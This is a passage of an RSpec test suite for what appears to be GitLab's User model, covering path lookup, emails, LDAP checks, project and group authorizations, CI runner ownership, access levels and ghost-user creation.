expect(described_class.find_by_full_path(redirect_route.path, follow_redirects: true)).to eq(user)
end
it 'is case-insensitive' do
expect(described_class.find_by_full_path(redirect_route.path.upcase, follow_redirects: true)).to eq(user)
expect(described_class.find_by_full_path(redirect_route.path.downcase, follow_redirects: true)).to eq(user)
end
end
end
context 'without a route or a redirect route matching the given path' do
context 'without the follow_redirects option' do
it 'returns nil' do
expect(described_class.find_by_full_path('unknown')).to eq(nil)
end
end
context 'with the follow_redirects option set to true' do
it 'returns nil' do
expect(described_class.find_by_full_path('unknown', follow_redirects: true)).to eq(nil)
end
end
end
context 'with a group route matching the given path' do
let!(:group) { create(:group, path: 'group_path') }
context 'when the group namespace has an owner_id (legacy data)' do
before do
group.update!(owner_id: user.id)
end
it 'returns nil' do
expect(described_class.find_by_full_path('group_path')).to eq(nil)
end
end
context 'when the group namespace does not have an owner_id' do
it 'returns nil' do
expect(described_class.find_by_full_path('group_path')).to eq(nil)
end
end
end
end
describe 'all_ssh_keys' do
it { is_expected.to have_many(:keys).dependent(:destroy) }
it "has all ssh keys" do
user = create :user
key = create :key, key: "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD33bWLBxu48Sev9Fert1yzEO4WGcWglWF7K/AwblIUFselOt/QdOL9DSjpQGxLagO1s9wl53STIO8qGS4Ms0EJZyIXOEFMjFJ5xmjSy+S37By4sG7SsltQEHMxtbtFOaW5LV2wCrX+rUsRNqLMamZjgjcPO0/EgGCXIGMAYW4O7cwGZdXWYIhQ1Vwy+CsVMDdPkPgBXqK7nR/ey8KMs8ho5fMNgB5hBw/AL9fNGhRw3QTD6Q12Nkhl4VZES2EsZqlpNnJttnPdp847DUsT6yuLRlfiQfz5Cn9ysHFdXObMN5VYIiPFwHeYCZp1X2S4fDZooRE8uOLTfxWHPXwrhqSH", user_id: user.id
expect(user.all_ssh_keys).to include(a_string_starting_with(key.key))
end
end
describe '#avatar_type' do
let(:user) { create(:user) }
it 'is true if avatar is image' do
user.update_attribute(:avatar, 'uploads/avatar.png')
expect(user.avatar_type).to be_truthy
end
it 'is false if avatar is html page' do
user.update_attribute(:avatar, 'uploads/avatar.html')
expect(user.avatar_type).to eq(['file format is not supported. Please try one of the following supported formats: png, jpg, jpeg, gif, bmp, tiff, ico'])
end
end
describe '#avatar_url' do
let(:user) { create(:user, :with_avatar) }
context 'when avatar file is uploaded' do
it 'shows correct avatar url' do
expect(user.avatar_url).to eq(user.avatar.url)
expect(user.avatar_url(only_path: false)).to eq([Gitlab.config.gitlab.url, user.avatar.url].join)
end
end
end
describe '#accept_pending_invitations!' do
let(:user) { create(:user, email: '[email protected]') }
let!(:project_member_invite) { create(:project_member, :invited, invite_email: user.email) }
let!(:group_member_invite) { create(:group_member, :invited, invite_email: user.email) }
let!(:external_project_member_invite) { create(:project_member, :invited, invite_email: '[email protected]') }
let!(:external_group_member_invite) { create(:group_member, :invited, invite_email: '[email protected]') }
it 'accepts all the user members pending invitations and returns the accepted_members' do
accepted_members = user.accept_pending_invitations!
expect(accepted_members).to match_array([project_member_invite, group_member_invite])
expect(group_member_invite.reload).not_to be_invite
expect(project_member_invite.reload).not_to be_invite
expect(external_project_member_invite.reload).to be_invite
expect(external_group_member_invite.reload).to be_invite
end
end
describe '#all_emails' do
let(:user) { create(:user) }
let!(:email_confirmed) { create :email, user: user, confirmed_at: Time.now }
let!(:email_unconfirmed) { create :email, user: user }
context 'when `include_private_email` is true' do
it 'returns all emails' do
expect(user.reload.all_emails).to contain_exactly(
user.email,
user.private_commit_email,
email_unconfirmed.email,
email_confirmed.email
)
end
end
context 'when `include_private_email` is false' do
it 'does not include the private commit email' do
expect(user.reload.all_emails(include_private_email: false)).to contain_exactly(
user.email,
email_unconfirmed.email,
email_confirmed.email
)
end
end
end
describe '#verified_emails' do
let(:user) { create(:user) }
it 'returns only confirmed emails' do
email_confirmed = create :email, user: user, confirmed_at: Time.now
create :email, user: user
expect(user.verified_emails).to contain_exactly(
user.email,
user.private_commit_email,
email_confirmed.email
)
end
end
describe '#public_verified_emails' do
let(:user) { create(:user) }
it 'returns only confirmed public emails' do
email_confirmed = create :email, user: user, confirmed_at: Time.current
create :email, user: user
expect(user.public_verified_emails).to contain_exactly(
user.email,
email_confirmed.email
)
end
it 'returns confirmed public emails plus main user email when user is not confirmed' do
user = create(:user, confirmed_at: nil)
email_confirmed = create :email, user: user, confirmed_at: Time.current
create :email, user: user
expect(user.public_verified_emails).to contain_exactly(
user.email,
email_confirmed.email
)
end
end
describe '#verified_email?' do
let(:user) { create(:user) }
it 'returns true when the email is verified/confirmed' do
email_confirmed = create :email, user: user, confirmed_at: Time.now
create :email, user: user
user.reload
expect(user.verified_email?(user.email)).to be_truthy
expect(user.verified_email?(email_confirmed.email.titlecase)).to be_truthy
end
it 'returns true when user is found through private commit email' do
expect(user.verified_email?(user.private_commit_email)).to be_truthy
end
it 'returns true for an outdated private commit email' do
old_email = user.private_commit_email
user.update!(username: 'changed-username')
expect(user.verified_email?(old_email)).to be_truthy
end
it 'returns false when the email is not verified/confirmed' do
email_unconfirmed = create :email, user: user
user.reload
expect(user.verified_email?(email_unconfirmed.email)).to be_falsy
end
end
describe '#requires_ldap_check?' do
let(:user) { described_class.new }
it 'is false when LDAP is disabled' do
# Create a condition which would otherwise cause 'true' to be returned
allow(user).to receive(:ldap_user?).and_return(true)
user.last_credential_check_at = nil
expect(user.requires_ldap_check?).to be_falsey
end
context 'when LDAP is enabled' do
before do
allow(Gitlab.config.ldap).to receive(:enabled).and_return(true)
end
it 'is false for non-LDAP users' do
allow(user).to receive(:ldap_user?).and_return(false)
expect(user.requires_ldap_check?).to be_falsey
end
context 'and when the user is an LDAP user' do
before do
allow(user).to receive(:ldap_user?).and_return(true)
end
it 'is true when the user has never had an LDAP check before' do
user.last_credential_check_at = nil
expect(user.requires_ldap_check?).to be_truthy
end
it 'is true when the last LDAP check happened over 1 hour ago' do
user.last_credential_check_at = 2.hours.ago
expect(user.requires_ldap_check?).to be_truthy
end
end
end
end
context 'ldap synchronized user' do
describe '#ldap_user?' do
it 'is true if provider name starts with ldap' do
user = create(:omniauth_user, provider: 'ldapmain')
expect(user.ldap_user?).to be_truthy
end
it 'is false for other providers' do
user = create(:omniauth_user, provider: 'other-provider')
expect(user.ldap_user?).to be_falsey
end
it 'is false if no extern_uid is provided' do
user = create(:omniauth_user, extern_uid: nil)
expect(user.ldap_user?).to be_falsey
end
end
describe '#ldap_identity' do
it 'returns ldap identity' do
user = create :omniauth_user
expect(user.ldap_identity.provider).not_to be_empty
end
end
describe '#ldap_block' do
let(:user) { create(:omniauth_user, provider: 'ldapmain', name: 'John Smith') }
it 'blocks user flaging the action caming from ldap' do
user.ldap_block
expect(user.blocked?).to be_truthy
expect(user.ldap_blocked?).to be_truthy
end
context 'on a read-only instance' do
before do
allow(Gitlab::Database).to receive(:read_only?).and_return(true)
end
it 'does not block user' do
user.ldap_block
expect(user.blocked?).to be_falsey
expect(user.ldap_blocked?).to be_falsey
end
end
end
end
describe '#ultraauth_user?' do
it 'is true if provider is ultraauth' do
user = create(:omniauth_user, provider: 'ultraauth')
expect(user.ultraauth_user?).to be_truthy
end
it 'is false with othe provider' do
user = create(:omniauth_user, provider: 'not-ultraauth')
expect(user.ultraauth_user?).to be_falsey
end
it 'is false if no extern_uid is provided' do
user = create(:omniauth_user, extern_uid: nil)
expect(user.ldap_user?).to be_falsey
end
end
describe '#full_website_url' do
let(:user) { create(:user) }
it 'begins with http if website url omits it' do
user.website_url = 'test.com'
expect(user.full_website_url).to eq 'http://test.com'
end
it 'begins with http if website url begins with http' do
user.website_url = 'http://test.com'
expect(user.full_website_url).to eq 'http://test.com'
end
it 'begins with https if website url begins with https' do
user.website_url = 'https://test.com'
expect(user.full_website_url).to eq 'https://test.com'
end
end
describe '#short_website_url' do
let(:user) { create(:user) }
it 'does not begin with http if website url omits it' do
user.website_url = 'test.com'
expect(user.short_website_url).to eq 'test.com'
end
it 'does not begin with http if website url begins with http' do
user.website_url = 'http://test.com'
expect(user.short_website_url).to eq 'test.com'
end
it 'does not begin with https if website url begins with https' do
user.website_url = 'https://test.com'
expect(user.short_website_url).to eq 'test.com'
end
end
describe '#sanitize_attrs' do
let(:user) { build(:user, name: 'test & user', skype: 'test&user') }
it 'encodes HTML entities in the Skype attribute' do
expect { user.sanitize_attrs }.to change { user.skype }.to('test&user')
end
it 'does not encode HTML entities in the name attribute' do
expect { user.sanitize_attrs }.not_to change { user.name }
end
end
describe '#starred?' do
it 'determines if user starred a project' do
user = create :user
project1 = create(:project, :public)
project2 = create(:project, :public)
expect(user.starred?(project1)).to be_falsey
expect(user.starred?(project2)).to be_falsey
star1 = UsersStarProject.create!(project: project1, user: user)
expect(user.starred?(project1)).to be_truthy
expect(user.starred?(project2)).to be_falsey
star2 = UsersStarProject.create!(project: project2, user: user)
expect(user.starred?(project1)).to be_truthy
expect(user.starred?(project2)).to be_truthy
star1.destroy
expect(user.starred?(project1)).to be_falsey
expect(user.starred?(project2)).to be_truthy
star2.destroy
expect(user.starred?(project1)).to be_falsey
expect(user.starred?(project2)).to be_falsey
end
end
describe '#toggle_star' do
it 'toggles stars' do
user = create :user
project = create(:project, :public)
expect(user.starred?(project)).to be_falsey
user.toggle_star(project)
expect(user.starred?(project)).to be_truthy
user.toggle_star(project)
expect(user.starred?(project)).to be_falsey
end
end
describe '.find_by_private_commit_email' do
context 'with email' do
let_it_be(:user) { create(:user) }
it 'returns user through private commit email' do
expect(described_class.find_by_private_commit_email(user.private_commit_email)).to eq(user)
end
it 'returns nil when email other than private_commit_email is used' do
expect(described_class.find_by_private_commit_email(user.email)).to be_nil
end
end
it 'returns nil when email is nil' do
expect(described_class.find_by_private_commit_email(nil)).to be_nil
end
end
describe '#sort_by_attribute' do
before do
described_class.delete_all
@user = create :user, created_at: Date.today, current_sign_in_at: Date.today, name: 'Alpha'
@user1 = create :user, created_at: Date.today - 1, current_sign_in_at: Date.today - 1, name: 'Omega'
@user2 = create :user, created_at: Date.today - 2, name: 'Beta'
end
context 'when sort by recent_sign_in' do
let(:users) { described_class.sort_by_attribute('recent_sign_in') }
it 'sorts users by recent sign-in time' do
expect(users.first).to eq(@user)
expect(users.second).to eq(@user1)
end
it 'pushes users who never signed in to the end' do
expect(users.third).to eq(@user2)
end
end
context 'when sort by oldest_sign_in' do
let(:users) { described_class.sort_by_attribute('oldest_sign_in') }
it 'sorts users by the oldest sign-in time' do
expect(users.first).to eq(@user1)
expect(users.second).to eq(@user)
end
it 'pushes users who never signed in to the end' do
expect(users.third).to eq(@user2)
end
end
it 'sorts users in descending order by their creation time' do
expect(described_class.sort_by_attribute('created_desc').first).to eq(@user)
end
it 'sorts users in ascending order by their creation time' do
expect(described_class.sort_by_attribute('created_asc').first).to eq(@user2)
end
it 'sorts users by id in descending order when nil is passed' do
expect(described_class.sort_by_attribute(nil).first).to eq(@user2)
end
end
describe "#last_active_at" do
let(:last_activity_on) { 5.days.ago.to_date }
let(:current_sign_in_at) { 8.days.ago }
context 'for a user that has `last_activity_on` set' do
let(:user) { create(:user, last_activity_on: last_activity_on) }
it 'returns `last_activity_on` with current time zone' do
expect(user.last_active_at).to eq(last_activity_on.to_time.in_time_zone)
end
end
context 'for a user that has `current_sign_in_at` set' do
let(:user) { create(:user, current_sign_in_at: current_sign_in_at) }
it 'returns `current_sign_in_at`' do
expect(user.last_active_at).to eq(current_sign_in_at)
end
end
context 'for a user that has both `current_sign_in_at` & ``last_activity_on`` set' do
let(:user) { create(:user, current_sign_in_at: current_sign_in_at, last_activity_on: last_activity_on) }
it 'returns the latest among `current_sign_in_at` & `last_activity_on`' do
latest_event = [current_sign_in_at, last_activity_on.to_time.in_time_zone].max
expect(user.last_active_at).to eq(latest_event)
end
end
context 'for a user that does not have both `current_sign_in_at` & `last_activity_on` set' do
let(:user) { create(:user, current_sign_in_at: nil, last_activity_on: nil) }
it 'returns nil' do
expect(user.last_active_at).to eq(nil)
end
end
end
describe "#can_be_deactivated?" do
let(:activity) { {} }
let(:user) { create(:user, name: 'John Smith', **activity) }
let(:day_within_minium_inactive_days_threshold) { User::MINIMUM_INACTIVE_DAYS.pred.days.ago }
let(:day_outside_minium_inactive_days_threshold) { User::MINIMUM_INACTIVE_DAYS.next.days.ago }
shared_examples 'not eligible for deactivation' do
it 'returns false' do
expect(user.can_be_deactivated?).to be_falsey
end
end
shared_examples 'eligible for deactivation' do
it 'returns true' do
expect(user.can_be_deactivated?).to be_truthy
end
end
context "a user who is not active" do
before do
user.block
end
it_behaves_like 'not eligible for deactivation'
end
context 'a user who has activity within the specified minimum inactive days' do
let(:activity) { { last_activity_on: day_within_minium_inactive_days_threshold } }
it_behaves_like 'not eligible for deactivation'
end
context 'a user who has signed in within the specified minimum inactive days' do
let(:activity) { { current_sign_in_at: day_within_minium_inactive_days_threshold } }
it_behaves_like 'not eligible for deactivation'
end
context 'a user who has no activity within the specified minimum inactive days' do
let(:activity) { { last_activity_on: day_outside_minium_inactive_days_threshold } }
it_behaves_like 'eligible for deactivation'
end
context 'a user who has not signed in within the specified minimum inactive days' do
let(:activity) { { current_sign_in_at: day_outside_minium_inactive_days_threshold } }
it_behaves_like 'eligible for deactivation'
end
end
describe "#contributed_projects" do
subject { create(:user) }
let!(:project1) { create(:project) }
let!(:project2) { fork_project(project3) }
let!(:project3) { create(:project) }
let!(:merge_request) { create(:merge_request, source_project: project2, target_project: project3, author: subject) }
let!(:push_event) { create(:push_event, project: project1, author: subject) }
let!(:merge_event) { create(:event, :created, project: project3, target: merge_request, author: subject) }
before do
project1.add_maintainer(subject)
project2.add_maintainer(subject)
end
it "includes IDs for projects the user has pushed to" do
expect(subject.contributed_projects).to include(project1)
end
it "includes IDs for projects the user has had merge requests merged into" do
expect(subject.contributed_projects).to include(project3)
end
it "doesn't include IDs for unrelated projects" do
expect(subject.contributed_projects).not_to include(project2)
end
end
describe '#fork_of' do
let(:user) { create(:user) }
it "returns a user's fork of a project" do
project = create(:project, :public)
user_fork = fork_project(project, user, namespace: user.namespace)
expect(user.fork_of(project)).to eq(user_fork)
end
it 'returns nil if the project does not have a fork network' do
project = create(:project)
expect(user.fork_of(project)).to be_nil
end
end
describe '#can_be_removed?' do
subject { create(:user) }
context 'no owned groups' do
it { expect(subject.can_be_removed?).to be_truthy }
end
context 'has owned groups' do
before do
group = create(:group)
group.add_owner(subject)
end
it { expect(subject.can_be_removed?).to be_falsey }
end
end
describe "#recent_push" do
let(:user) { build(:user) }
let(:project) { build(:project) }
let(:event) { build(:push_event) }
it 'returns the last push event for the user' do
expect_any_instance_of(Users::LastPushEventService)
.to receive(:last_event_for_user)
.and_return(event)
expect(user.recent_push).to eq(event)
end
it 'returns the last push event for a project when one is given' do
expect_any_instance_of(Users::LastPushEventService)
.to receive(:last_event_for_project)
.and_return(event)
expect(user.recent_push(project)).to eq(event)
end
end
describe '#authorized_groups' do
let!(:user) { create(:user) }
let!(:private_group) { create(:group) }
let!(:child_group) { create(:group, parent: private_group) }
let!(:project_group) { create(:group) }
let!(:project) { create(:project, group: project_group) }
before do
private_group.add_user(user, Gitlab::Access::MAINTAINER)
project.add_maintainer(user)
end
subject { user.authorized_groups }
it { is_expected.to contain_exactly private_group, project_group }
end
describe '#membership_groups' do
let!(:user) { create(:user) }
let!(:parent_group) { create(:group) }
let!(:child_group) { create(:group, parent: parent_group) }
before do
parent_group.add_user(user, Gitlab::Access::MAINTAINER)
end
subject { user.membership_groups }
it { is_expected.to contain_exactly parent_group, child_group }
end
describe '#authorizations_for_projects' do
let!(:user) { create(:user) }
subject { Project.where("EXISTS (?)", user.authorizations_for_projects) }
it 'includes projects that belong to a user, but no other projects' do
owned = create(:project, :private, namespace: user.namespace)
member = create(:project, :private).tap { |p| p.add_maintainer(user) }
other = create(:project)
expect(subject).to include(owned)
expect(subject).to include(member)
expect(subject).not_to include(other)
end
it 'includes projects a user has access to, but no other projects' do
other_user = create(:user)
accessible = create(:project, :private, namespace: other_user.namespace) do |project|
project.add_developer(user)
end
other = create(:project)
expect(subject).to include(accessible)
expect(subject).not_to include(other)
end
context 'with min_access_level' do
let!(:user) { create(:user) }
let!(:project) { create(:project, :private, namespace: user.namespace) }
before do
project.add_developer(user)
end
subject { Project.where("EXISTS (?)", user.authorizations_for_projects(min_access_level: min_access_level)) }
context 'when developer access' do
let(:min_access_level) { Gitlab::Access::DEVELOPER }
it 'includes projects a user has access to' do
expect(subject).to include(project)
end
end
context 'when owner access' do
let(:min_access_level) { Gitlab::Access::OWNER }
it 'does not include projects with higher access level' do
expect(subject).not_to include(project)
end
end
end
end
describe '#authorized_projects', :delete do
context 'with a minimum access level' do
it 'includes projects for which the user is an owner' do
user = create(:user)
project = create(:project, :private, namespace: user.namespace)
expect(user.authorized_projects(Gitlab::Access::REPORTER))
.to contain_exactly(project)
end
it 'includes projects for which the user is a maintainer' do
user = create(:user)
project = create(:project, :private)
project.add_maintainer(user)
expect(user.authorized_projects(Gitlab::Access::REPORTER))
.to contain_exactly(project)
end
end
it "includes user's personal projects" do
user = create(:user)
project = create(:project, :private, namespace: user.namespace)
expect(user.authorized_projects).to include(project)
end
it "includes personal projects user has been given access to" do
user1 = create(:user)
user2 = create(:user)
project = create(:project, :private, namespace: user1.namespace)
project.add_developer(user2)
expect(user2.authorized_projects).to include(project)
end
it "includes projects of groups user has been added to" do
group = create(:group)
project = create(:project, group: group)
user = create(:user)
group.add_developer(user)
expect(user.authorized_projects).to include(project)
end
it "does not include projects of groups user has been removed from" do
group = create(:group)
project = create(:project, group: group)
user = create(:user)
member = group.add_developer(user)
expect(user.authorized_projects).to include(project)
member.destroy
expect(user.authorized_projects).not_to include(project)
end
it "includes projects shared with user's group" do
user = create(:user)
project = create(:project, :private)
group = create(:group)
group.add_reporter(user)
project.project_group_links.create(group: group)
expect(user.authorized_projects).to include(project)
end
it "does not include destroyed projects user had access to" do
user1 = create(:user)
user2 = create(:user)
project = create(:project, :private, namespace: user1.namespace)
project.add_developer(user2)
expect(user2.authorized_projects).to include(project)
project.destroy
expect(user2.authorized_projects).not_to include(project)
end
it "does not include projects of destroyed groups user had access to" do
group = create(:group)
project = create(:project, namespace: group)
user = create(:user)
group.add_developer(user)
expect(user.authorized_projects).to include(project)
group.destroy
expect(user.authorized_projects).not_to include(project)
end
end
describe '#projects_where_can_admin_issues' do
let(:user) { create(:user) }
it 'includes projects for which the user access level is above or equal to reporter' do
reporter_project = create(:project) { |p| p.add_reporter(user) }
developer_project = create(:project) { |p| p.add_developer(user) }
maintainer_project = create(:project) { |p| p.add_maintainer(user) }
expect(user.projects_where_can_admin_issues.to_a).to match_array([maintainer_project, developer_project, reporter_project])
expect(user.can?(:admin_issue, maintainer_project)).to eq(true)
expect(user.can?(:admin_issue, developer_project)).to eq(true)
expect(user.can?(:admin_issue, reporter_project)).to eq(true)
end
it 'does not include for which the user access level is below reporter' do
project = create(:project)
guest_project = create(:project) { |p| p.add_guest(user) }
expect(user.projects_where_can_admin_issues.to_a).to be_empty
expect(user.can?(:admin_issue, guest_project)).to eq(false)
expect(user.can?(:admin_issue, project)).to eq(false)
end
it 'does not include archived projects' do
project = create(:project, :archived)
expect(user.projects_where_can_admin_issues.to_a).to be_empty
expect(user.can?(:admin_issue, project)).to eq(false)
end
it 'does not include projects for which issues are disabled' do
project = create(:project, :issues_disabled)
expect(user.projects_where_can_admin_issues.to_a).to be_empty
expect(user.can?(:admin_issue, project)).to eq(false)
end
end
describe '#ci_owned_runners' do
let(:user) { create(:user) }
shared_examples :nested_groups_owner do
context 'when the user is the owner of a multi-level group' do
before do
set_permissions_for_users
end
it 'loads all the runners in the tree of groups' do
expect(user.ci_owned_runners).to contain_exactly(runner, group_runner)
end
end
end
shared_examples :group_owner do
context 'when the user is the owner of a one level group' do
before do
group.add_owner(user)
end
it 'loads the runners in the group' do
expect(user.ci_owned_runners).to contain_exactly(group_runner)
end
end
end
shared_examples :project_owner do
context 'when the user is the owner of a project' do
it 'loads the runner belonging to the project' do
expect(user.ci_owned_runners).to contain_exactly(runner)
end
end
end
shared_examples :project_member do
context 'when the user is a maintainer' do
before do
add_user(:maintainer)
end
it 'loads the runners of the project' do
expect(user.ci_owned_runners).to contain_exactly(project_runner)
end
end
context 'when the user is a developer' do
before do
add_user(:developer)
end
it 'does not load any runner' do
expect(user.ci_owned_runners).to be_empty
end
end
context 'when the user is a reporter' do
before do
add_user(:reporter)
end
it 'does not load any runner' do
expect(user.ci_owned_runners).to be_empty
end
end
context 'when the user is a guest' do
before do
add_user(:guest)
end
it 'does not load any runner' do
expect(user.ci_owned_runners).to be_empty
end
end
end
shared_examples :group_member do
context 'when the user is a maintainer' do
before do
add_user(:maintainer)
end
it 'does not load the runners of the group' do
expect(user.ci_owned_runners).to be_empty
end
end
context 'when the user is a developer' do
before do
add_user(:developer)
end
it 'does not load any runner' do
expect(user.ci_owned_runners).to be_empty
end
end
context 'when the user is a reporter' do
before do
add_user(:reporter)
end
it 'does not load any runner' do
expect(user.ci_owned_runners).to be_empty
end
end
context 'when the user is a guest' do
before do
add_user(:guest)
end
it 'does not load any runner' do
expect(user.ci_owned_runners).to be_empty
end
end
end
context 'without any projects nor groups' do
it 'does not load any runner' do
expect(user.ci_owned_runners).to be_empty
end
end
context 'with runner in a personal project' do
let!(:namespace) { create(:namespace, owner: user) }
let!(:project) { create(:project, namespace: namespace) }
let!(:runner) { create(:ci_runner, :project, projects: [project]) }
it_behaves_like :project_owner
end
context 'with group runner in a non owned group' do
let!(:group) { create(:group) }
let!(:runner) { create(:ci_runner, :group, groups: [group]) }
def add_user(access)
group.add_user(user, access)
end
it_behaves_like :group_member
end
context 'with group runner in an owned group' do
let!(:group) { create(:group) }
let!(:group_runner) { create(:ci_runner, :group, groups: [group]) }
it_behaves_like :group_owner
end
context 'with group runner in an owned group and group runner in a different owner subgroup' do
let!(:group) { create(:group) }
let!(:runner) { create(:ci_runner, :group, groups: [group]) }
let!(:subgroup) { create(:group, parent: group) }
let!(:group_runner) { create(:ci_runner, :group, groups: [subgroup]) }
let!(:another_user) { create(:user) }
def set_permissions_for_users
group.add_owner(user)
subgroup.add_owner(another_user)
end
it_behaves_like :nested_groups_owner
end
context 'with personal project runner in an an owned group and a group runner in that same group' do
let!(:group) { create(:group) }
let!(:group_runner) { create(:ci_runner, :group, groups: [group]) }
let!(:project) { create(:project, group: group) }
let!(:runner) { create(:ci_runner, :project, projects: [project]) }
def set_permissions_for_users
group.add_owner(user)
end
it_behaves_like :nested_groups_owner
end
context 'with personal project runner in an owned group and a group runner in a subgroup' do
let!(:group) { create(:group) }
let!(:subgroup) { create(:group, parent: group) }
let!(:group_runner) { create(:ci_runner, :group, groups: [subgroup]) }
let!(:project) { create(:project, group: group) }
let!(:runner) { create(:ci_runner, :project, projects: [project]) }
def set_permissions_for_users
group.add_owner(user)
end
it_behaves_like :nested_groups_owner
end
context 'with personal project runner in an owned group in an owned namespace and a group runner in that group' do
let!(:namespace) { create(:namespace, owner: user) }
let!(:group) { create(:group) }
let!(:group_runner) { create(:ci_runner, :group, groups: [group]) }
let!(:project) { create(:project, namespace: namespace, group: group) }
let!(:runner) { create(:ci_runner, :project, projects: [project]) }
def set_permissions_for_users
group.add_owner(user)
end
it_behaves_like :nested_groups_owner
end
context 'with personal project runner in an owned namespace, an owned group, a subgroup and a group runner in that subgroup' do
let!(:namespace) { create(:namespace, owner: user) }
let!(:group) { create(:group) }
let!(:subgroup) { create(:group, parent: group) }
let!(:group_runner) { create(:ci_runner, :group, groups: [subgroup]) }
let!(:project) { create(:project, namespace: namespace, group: group) }
let!(:runner) { create(:ci_runner, :project, projects: [project]) }
def set_permissions_for_users
group.add_owner(user)
end
it_behaves_like :nested_groups_owner
end
context 'with a project runner that belong to projects that belong to a not owned group' do
let!(:group) { create(:group) }
let!(:project) { create(:project, group: group) }
let!(:project_runner) { create(:ci_runner, :project, projects: [project]) }
def add_user(access)
project.add_user(user, access)
end
it_behaves_like :project_member
end
context 'with project runners that belong to projects that do not belong to any group' do
let!(:project) { create(:project) }
let!(:runner) { create(:ci_runner, :project, projects: [project]) }
it 'does not load any runner' do
expect(user.ci_owned_runners).to be_empty
end
end
context 'with a group runner that belongs to a subgroup of a group owned by another user' do
let!(:group) { create(:group) }
let!(:subgroup) { create(:group, parent: group) }
let!(:runner) { create(:ci_runner, :group, groups: [subgroup]) }
let!(:another_user) { create(:user) }
def add_user(access)
subgroup.add_user(user, access)
group.add_user(another_user, :owner)
end
it_behaves_like :group_member
end
end
describe '#projects_with_reporter_access_limited_to' do
let(:project1) { create(:project) }
let(:project2) { create(:project) }
let(:user) { create(:user) }
before do
project1.add_reporter(user)
project2.add_guest(user)
end
it 'returns the projects when using a single project ID' do
projects = user.projects_with_reporter_access_limited_to(project1.id)
expect(projects).to eq([project1])
end
it 'returns the projects when using an Array of project IDs' do
projects = user.projects_with_reporter_access_limited_to([project1.id])
expect(projects).to eq([project1])
end
it 'returns the projects when using an ActiveRecord relation' do
projects = user
.projects_with_reporter_access_limited_to(Project.select(:id))
expect(projects).to eq([project1])
end
it 'does not return projects you do not have reporter access to' do
projects = user.projects_with_reporter_access_limited_to(project2.id)
expect(projects).to be_empty
end
end
describe '#all_expanded_groups' do
# foo/bar would also match foo/barbaz instead of just foo/bar and foo/bar/baz
let!(:user) { create(:user) }
# group
# _______ (foo) _______
# | |
# | |
# nested_group_1 nested_group_2
# (bar) (barbaz)
# | |
# | |
# nested_group_1_1 nested_group_2_1
# (baz) (baz)
#
let!(:group) { create :group }
let!(:nested_group_1) { create :group, parent: group, name: 'bar' }
let!(:nested_group_1_1) { create :group, parent: nested_group_1, name: 'baz' }
let!(:nested_group_2) { create :group, parent: group, name: 'barbaz' }
let!(:nested_group_2_1) { create :group, parent: nested_group_2, name: 'baz' }
subject { user.all_expanded_groups }
context 'user is not a member of any group' do
it 'returns an empty array' do
is_expected.to eq([])
end
end
context 'user is member of all groups' do
before do
group.add_reporter(user)
nested_group_1.add_developer(user)
nested_group_1_1.add_maintainer(user)
nested_group_2.add_developer(user)
nested_group_2_1.add_maintainer(user)
end
it 'returns all groups' do
is_expected.to match_array [
group,
nested_group_1, nested_group_1_1,
nested_group_2, nested_group_2_1
]
end
end
context 'user is member of the top group' do
before do
group.add_owner(user)
end
it 'returns all groups' do
is_expected.to match_array [
group,
nested_group_1, nested_group_1_1,
nested_group_2, nested_group_2_1
]
end
end
context 'user is member of the first child (internal node), branch 1' do
before do
nested_group_1.add_owner(user)
end
it 'returns the groups in the hierarchy' do
is_expected.to match_array [
group,
nested_group_1, nested_group_1_1
]
end
end
context 'user is member of the first child (internal node), branch 2' do
before do
nested_group_2.add_owner(user)
end
it 'returns the groups in the hierarchy' do
is_expected.to match_array [
group,
nested_group_2, nested_group_2_1
]
end
end
context 'user is member of the last child (leaf node)' do
before do
nested_group_1_1.add_owner(user)
end
it 'returns the groups in the hierarchy' do
is_expected.to match_array [
group,
nested_group_1, nested_group_1_1
]
end
end
end
describe '#refresh_authorized_projects', :clean_gitlab_redis_shared_state do
let(:project1) { create(:project) }
let(:project2) { create(:project) }
let(:user) { create(:user) }
before do
project1.add_reporter(user)
project2.add_guest(user)
user.project_authorizations.delete_all
user.refresh_authorized_projects
end
it 'refreshes the list of authorized projects' do
expect(user.project_authorizations.count).to eq(2)
end
it 'stores the correct access levels' do
expect(user.project_authorizations.where(access_level: Gitlab::Access::GUEST).exists?).to eq(true)
expect(user.project_authorizations.where(access_level: Gitlab::Access::REPORTER).exists?).to eq(true)
end
end
describe '#access_level=' do
let(:user) { build(:user) }
it 'does nothing for an invalid access level' do
user.access_level = :invalid_access_level
expect(user.access_level).to eq(:regular)
expect(user.admin).to be false
end
it "assigns the 'admin' access level" do
user.access_level = :admin
expect(user.access_level).to eq(:admin)
expect(user.admin).to be true
end
it "doesn't clear existing access levels when an invalid access level is passed in" do
user.access_level = :admin
user.access_level = :invalid_access_level
expect(user.access_level).to eq(:admin)
expect(user.admin).to be true
end
it "accepts string values in addition to symbols" do
user.access_level = 'admin'
expect(user.access_level).to eq(:admin)
expect(user.admin).to be true
end
end
describe '#can_read_all_resources?', :request_store do
it 'returns false for regular user' do
user = build_stubbed(:user)
expect(user.can_read_all_resources?).to be_falsy
end
context 'for admin user' do
include_context 'custom session'
let(:user) { build_stubbed(:user, :admin) }
context 'when admin mode is disabled' do
it 'returns false' do
expect(user.can_read_all_resources?).to be_falsy
end
end
context 'when admin mode is enabled' do
before do
Gitlab::Auth::CurrentUserMode.new(user).request_admin_mode!
Gitlab::Auth::CurrentUserMode.new(user).enable_admin_mode!(password: user.password)
end
it 'returns true' do
expect(user.can_read_all_resources?).to be_truthy
end
end
end
end
describe '.ghost' do
it "creates a ghost user if one isn't already present" do
ghost = described_class.ghost
expect(ghost).to be_ghost
expect(ghost).to be_persisted
expect(ghost.namespace).not_to be_nil
expect(ghost.namespace).to be_persisted
expect(ghost.user_type).to eq 'ghost'
end
it "does not create a second ghost user if one is already present" do
expect do
described_class.ghost
described_class.ghost
end.to change { described_class.count }.by(1)
expect(described_class.ghost).to eq(described_class.ghost)
end
context "when a regular user exists with the username 'ghost'" do
it "creates a ghost user with a non-conflicting username" do
create(:user, username: 'ghost')
ghost = described_class.ghost
expect(ghost).to be_persisted
expect(ghost.username).to eq('ghost1')
end
end
context "when a regular user exists with the email '[email protected]'" do
it "creates a ghost user with a non-conflicting email" do
create(:user, email: '[email protected]')
ghost = described_class.ghost
expect(ghost).to be_persisted
expect(ghost.email).to eq('[email protected]')
end
end
context 'when a domain whitelist is in place' do
before do
stub_application_setting(domain_whitelist: ['gitlab.com'])
end
it 'creates a ghost user' do
expect(described_class.ghost).to be_persisted
end
end
end
